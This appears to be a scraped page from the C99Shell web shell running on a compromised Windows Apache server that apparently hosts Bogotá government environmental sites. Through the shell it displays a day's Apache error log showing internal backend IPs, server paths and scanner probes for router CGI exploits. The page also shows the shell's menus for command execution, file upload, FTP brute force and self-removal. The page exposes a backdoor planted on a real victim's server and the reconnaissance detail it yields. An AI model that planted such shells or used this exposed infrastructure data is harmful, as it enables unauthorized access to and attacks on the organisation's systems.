!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 7.34 GB of 239.26 GB (3.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2017.01.25.log (27.7 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Wed Jan 25 00:45:23.032089 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 01:42:59.125559 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 01:45:36.186635 2017] [proxy:error] [pid 7252:tid 16032] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.32:80 (172.22.1.32) failed
[Wed Jan 25 01:45:36.186635 2017] [proxy:error] [pid 7252:tid 16032] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.32) for 60s
[Wed Jan 25 01:45:36.186635 2017] [proxy_http:error] [pid 7252:tid 16032] [client 207.46.13.11:19186] AH01114: HTTP: failed to make connection to backend: 172.22.1.32
[Wed Jan 25 01:52:48.931395 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 02:05:43.770156 2017] [core:error] [pid 7252:tid 14756] (20024)The given path is misformatted or contained invalid characters: [client 163.172.65.50:46096] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Wed Jan 25 02:53:12.835360 2017] [proxy:error] [pid 7252:tid 16032] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Wed Jan 25 02:53:12.835360 2017] [proxy:error] [pid 7252:tid 16032] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Wed Jan 25 02:53:12.835360 2017] [proxy_http:error] [pid 7252:tid 16032] [client 152.61.128.50:45194] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Wed Jan 25 02:53:13.022560 2017] [proxy:error] [pid 7252:tid 16032] AH00940: HTTP: disabled connection for (172.22.1.51)
[Wed Jan 25 02:53:13.209761 2017] [proxy:error] [pid 7252:tid 16032] AH00940: HTTP: disabled connection for (172.22.1.51)
[Wed Jan 25 04:40:47.472497 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 06:50:50.484402 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 07:09:44.871595 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 07:41:59.478793 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 08:03:31.660263 2017] [proxy_http:error] [pid 7252:tid 14836] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:14099] AH01102: error reading status line from remote server 172.22.1.31:80
[Wed Jan 25 08:03:31.660263 2017] [proxy:error] [pid 7252:tid 14836] [client 201.245.192.253:14099] AH00898: Error reading from remote server returned by /isolucionsda/Session.asp
[Wed Jan 25 08:05:46.912500 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 08:05:48.550503 2017] [proxy_http:error] [pid 7252:tid 15916] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.26.72.204:20264] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Wed Jan 25 08:05:48.644103 2017] [proxy_http:error] [pid 7252:tid 15212] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.26.72.204:20265] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Wed Jan 25 08:05:48.722103 2017] [proxy_http:error] [pid 7252:tid 16064] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.26.72.204:20266] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Wed Jan 25 08:23:53.003008 2017] [proxy_http:error] [pid 7252:tid 15092] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:12145] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Wed Jan 25 08:23:53.034208 2017] [proxy_http:error] [pid 7252:tid 14652] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:12146] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Wed Jan 25 08:32:09.614280 2017] [core:error] [pid 7252:tid 15148] (20024)The given path is misformatted or contained invalid characters: [client 65.208.151.119:14245] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file, referer: http://www.dama.gov.co/
[Wed Jan 25 08:33:28.410018 2017] [proxy_http:error] [pid 7252:tid 14676] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:34048] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Wed Jan 25 08:33:28.410018 2017] [proxy:error] [pid 7252:tid 14676] [client 201.245.192.253:34048] AH00898: Error reading from remote server returned by /ISOlucionSDA/g/Plantillas/ModeloMP2/FlechaEstrategico.png, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Wed Jan 25 08:33:28.410018 2017] [proxy_http:error] [pid 7252:tid 15800] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:34046] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Wed Jan 25 08:33:28.410018 2017] [proxy_http:error] [pid 7252:tid 15712] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:34049] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Wed Jan 25 08:33:28.410018 2017] [proxy:error] [pid 7252:tid 15712] [client 201.245.192.253:34049] AH00898: Error reading from remote server returned by /ISOlucionSDA/g/Plantillas/ModeloMP2/FlechaSup.png, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Wed Jan 25 10:00:19.194571 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 10:02:46.973630 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 10:26:22.786317 2017] [proxy_http:error] [pid 7252:tid 14452] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.25.157.12:50128] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Wed Jan 25 10:26:22.786317 2017] [proxy:error] [pid 7252:tid 14452] [client 190.25.157.12:50128] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Wed Jan 25 10:26:23.410318 2017] [proxy_http:error] [pid 7252:tid 15800] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.25.157.12:50126] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Wed Jan 25 11:05:26.425233 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 11:37:08.802775 2017] [proxy_http:error] [pid 7252:tid 14924] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 66.249.88.4:47910] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Wed Jan 25 11:37:09.582776 2017] [proxy_http:error] [pid 7252:tid 14924] (20014)Internal error: [client 201.245.192.253:13816] AH01102: error reading status line from remote server 172.22.1.43:80, referer: http://190.27.245.106/desprendiblespago/controlador
[Wed Jan 25 11:37:09.582776 2017] [proxy:error] [pid 7252:tid 14924] [client 201.245.192.253:13816] AH00898: Error reading from remote server returned by /desprendiblespago/controlador, referer: http://190.27.245.106/desprendiblespago/controlador
[Wed Jan 25 11:37:19.192393 2017] [proxy_http:error] [pid 7252:tid 12596] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 191.95.246.15:28404] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Wed Jan 25 11:37:19.192393 2017] [proxy:error] [pid 7252:tid 12596] [client 191.95.246.15:28404] AH00898: Error reading from remote server returned by /ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Wed Jan 25 11:47:43.177889 2017] [proxy_http:error] [pid 7252:tid 15020] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 132.255.20.132:59902] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=10405
[Wed Jan 25 11:47:43.209089 2017] [proxy_http:error] [pid 7252:tid 15092] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 132.255.20.132:59901] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=10405
[Wed Jan 25 11:54:00.667352 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 12:53:12.622991 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 13:11:58.805569 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 13:41:10.095845 2017] [proxy_http:error] [pid 7252:tid 15456] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:27084] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Wed Jan 25 13:41:10.095845 2017] [proxy:error] [pid 7252:tid 15456] [client 201.245.192.253:27084] AH00898: Error reading from remote server returned by /isolucionsda/, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Wed Jan 25 13:53:40.785763 2017] [core:error] [pid 7252:tid 12532] (20024)The given path is misformatted or contained invalid characters: [client 157.55.39.144:16695] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Wed Jan 25 14:02:34.774701 2017] [proxy_http:error] [pid 7252:tid 14940] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:24408] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Wed Jan 25 14:02:36.038304 2017] [proxy_http:error] [pid 7252:tid 12748] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:24241] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Wed Jan 25 14:02:36.038304 2017] [proxy:error] [pid 7252:tid 12748] [client 201.245.192.253:24241] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Wed Jan 25 14:33:17.605938 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 14:40:31.941901 2017] [proxy_http:error] [pid 7252:tid 14484] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:25913] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Wed Jan 25 14:40:31.957501 2017] [proxy_http:error] [pid 7252:tid 15792] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:25908] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Wed Jan 25 14:40:31.957501 2017] [proxy_http:error] [pid 7252:tid 15928] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:25920] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Wed Jan 25 14:40:31.957501 2017] [proxy:error] [pid 7252:tid 15928] [client 201.245.192.253:25920] AH00898: Error reading from remote server returned by /ISOlucionSDA/g/Plantillas/ModeloMP2/CajaEstrategicoInf.png, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Wed Jan 25 14:40:32.035501 2017] [proxy_http:error] [pid 7252:tid 14580] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:25975] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Wed Jan 25 14:40:32.035501 2017] [proxy:error] [pid 7252:tid 14580] [client 201.245.192.253:25975] AH00898: Error reading from remote server returned by /ISOlucionSDA/g/Plantillas/ModeloMP2/img_interAmarilla_r1_c2.png, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Wed Jan 25 15:11:21.388549 2017] [core:error] [pid 7252:tid 12620] (20024)The given path is misformatted or contained invalid characters: [client 157.55.39.158:20357] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Wed Jan 25 15:27:48.386683 2017] [proxy_http:error] [pid 7252:tid 13268] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:16348] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=10550
[Wed Jan 25 15:55:07.014561 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 16:41:56.455696 2017] [proxy_http:error] [pid 7252:tid 15456] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:11076] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Wed Jan 25 16:41:56.455696 2017] [proxy:error] [pid 7252:tid 15456] [client 201.245.192.253:11076] AH00898: Error reading from remote server returned by /IsolucionSDA/MagazinHome.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Wed Jan 25 16:41:56.455696 2017] [proxy_http:error] [pid 7252:tid 15968] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:11093] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Wed Jan 25 16:41:56.455696 2017] [proxy:error] [pid 7252:tid 15968] [client 201.245.192.253:11093] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Wed Jan 25 17:15:55.800478 2017] [proxy_http:error] [pid 7252:tid 15136] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:22809] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Wed Jan 25 17:15:55.800478 2017] [proxy:error] [pid 7252:tid 15136] [client 201.245.192.253:22809] AH00898: Error reading from remote server returned by /isolucionsda/, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Wed Jan 25 17:42:44.304703 2017] [cgi:error] [pid 7252:tid 14572] [client 177.32.144.88:58800] script not found or unable to stat: E:/nuevo/htdocs/hndUnblock.cgi
[Wed Jan 25 17:42:44.694704 2017] [cgi:error] [pid 7252:tid 14572] [client 177.32.144.88:58804] script not found or unable to stat: E:/nuevo/htdocs/tmUnblock.cgi
[Wed Jan 25 17:57:24.676649 2017] [negotiation:error] [pid 7252:tid 15928] [client 190.27.96.11:52088] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var, referer: http://www.secretariadeambiente.gov.co/ventanillavirtual/app
[Wed Jan 25 17:58:18.855544 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 17:59:26.934064 2017] [proxy_http:error] [pid 7252:tid 14484] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:13980] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Magazin.asp&Sigla=MAC&IdModulo=2
[Wed Jan 25 17:59:26.934064 2017] [proxy:error] [pid 7252:tid 14484] [client 201.245.192.253:13980] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Magazin.asp&Sigla=MAC&IdModulo=2
[Wed Jan 25 17:59:26.934064 2017] [proxy_http:error] [pid 7252:tid 14932] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:13979] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Magazin.asp&Sigla=MAC&IdModulo=2
[Wed Jan 25 17:59:26.934064 2017] [proxy:error] [pid 7252:tid 14932] [client 201.245.192.253:13979] AH00898: Error reading from remote server returned by /isolucionsda/BarraTitulos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Magazin.asp&Sigla=MAC&IdModulo=2
[Wed Jan 25 18:10:03.976783 2017] [proxy_http:error] [pid 7252:tid 15112] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:12017] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Wed Jan 25 18:10:06.535187 2017] [proxy_http:error] [pid 7252:tid 14688] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:12177] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Wed Jan 25 18:10:06.535187 2017] [proxy:error] [pid 7252:tid 14688] [client 201.245.192.253:12177] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Wed Jan 25 18:49:05.292295 2017] [proxy_http:error] [pid 7252:tid 12484] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:10663] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Wed Jan 25 18:49:05.292295 2017] [proxy:error] [pid 7252:tid 12484] [client 201.245.192.253:10663] AH00898: Error reading from remote server returned by /isolucionsda/Menu.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Wed Jan 25 19:13:05.752025 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jan 25 21:07:02.403633 2017] [proxy_http:error] [pid 7252:tid 15916] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 181.50.193.72:53126] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Wed Jan 25 21:07:02.403633 2017] [proxy:error] [pid 7252:tid 15916] [client 181.50.193.72:53126] AH00898: Error reading from remote server returned by /IsolucionSDA/MagazinHome.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Wed Jan 25 21:36:22.867725 2017] [proxy_http:error] [pid 7252:tid 14932] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.147.114.22:50376] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Wed Jan 25 21:36:25.363730 2017] [proxy_http:error] [pid 7252:tid 14892] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.147.114.22:50378] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Wed Jan 25 21:36:25.472930 2017] [proxy_http:error] [pid 7252:tid 12620] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.147.114.22:50380] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Wed Jan 25 21:36:25.472930 2017] [proxy:error] [pid 7252:tid 12620] [client 190.147.114.22:50380] AH00898: Error reading from remote server returned by /IsolucionSDA/SucursalSeleccion.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Wed Jan 25 22:05:11.570162 2017] [proxy_http:error] [pid 7252:tid 13048] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.212.129:26663] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/BancoConocimiento/A/Atencionasolicitudesderegistrodevertimientos_v3/Atencionasolicitudesderegistrodevertimientos_v3.asp?IdArticulo=9291
[Wed Jan 25 22:05:11.570162 2017] [proxy:error] [pid 7252:tid 13048] [client 186.29.212.129:26663] AH00898: Error reading from remote server returned by /isolucionsda/FrameSetArticulo.asp, referer: http://190.27.245.106/isolucionsda/BancoConocimiento/A/Atencionasolicitudesderegistrodevertimientos_v3/Atencionasolicitudesderegistrodevertimientos_v3.asp?IdArticulo=9291
[Wed Jan 25 22:05:18.262574 2017] [proxy_http:error] [pid 7252:tid 12484] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.29.212.129:26664] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/BancoConocimiento/A/Atencionasolicitudesderegistrodevertimientos_v3/Atencionasolicitudesderegistrodevertimientos_v3.asp?IdArticulo=9291
[Wed Jan 25 22:05:18.262574 2017] [proxy:error] [pid 7252:tid 12484] [client 186.29.212.129:26664] AH00898: Error reading from remote server returned by /isolucionsda/FrameSetArticulo.asp, referer: http://190.27.245.106/isolucionsda/BancoConocimiento/A/Atencionasolicitudesderegistrodevertimientos_v3/Atencionasolicitudesderegistrodevertimientos_v3.asp?IdArticulo=9291
[Wed Jan 25 22:21:01.081430 2017] [proxy_http:error] [pid 7252:tid 14452] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.147.114.22:50790] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Wed Jan 25 22:25:41.117521 2017] [proxy_http:error] [pid 7252:tid 14732] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 66.249.64.53:33102] AH01102: error reading status line from remote server 172.22.1.31:80
[Wed Jan 25 22:25:41.117521 2017] [proxy:error] [pid 7252:tid 14732] [client 66.249.64.53:33102] AH00898: Error reading from remote server returned by /isolucionsda/bancoconocimiento/C/ControlyTramitedeCorrespondenciaExternaEnviada_v4/ControlyTramitedeCorrespondenciaExternaEnviada_v4.asp
[Wed Jan 25 22:37:44.709192 2017] [proxy_http:error] [pid 7252:tid 12620] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.81.152.118:3533] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Session.asp?Continue=1
[Wed Jan 25 22:37:44.709192 2017] [proxy:error] [pid 7252:tid 12620] [client 186.81.152.118:3533] AH00898: Error reading from remote server returned by /IsolucionSDA/Session.asp, referer: http://190.27.245.106/IsolucionSDA/Session.asp?Continue=1
[Wed Jan 25 23:44:20.860011 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0468 ]--